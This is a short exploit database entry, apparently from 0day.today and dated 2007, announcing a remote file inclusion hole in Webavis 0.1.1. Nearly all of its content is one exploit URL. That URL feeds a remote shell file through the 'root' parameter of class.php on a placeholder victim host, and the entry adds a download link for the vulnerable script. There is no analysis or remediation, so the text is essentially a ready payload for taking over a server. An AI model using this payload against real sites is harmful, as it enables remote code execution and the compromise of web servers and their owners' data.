id: 1907
date: 05/24/2007
title: Webavis 0.1.1 (class.php root) Remote File Inclusion Vulnerability
author: ThE TiGeR
cves: 

==================================================================
Webavis 0.1.1 (class.php root) Remote File Inclusion Vulnerability
==================================================================


#Webavis Remote file inclusion (root)

#Download script : http://webavis.myreseau.org/src/webavis-0.1.1.tar.gz

#Thanks Str0ke :D

#Exploit :

#http://victim.com/webavis/class/class.php?root=shell.txt ?

#Discovered by ThE TiGeR



#  0day.today [2023-03-26]  #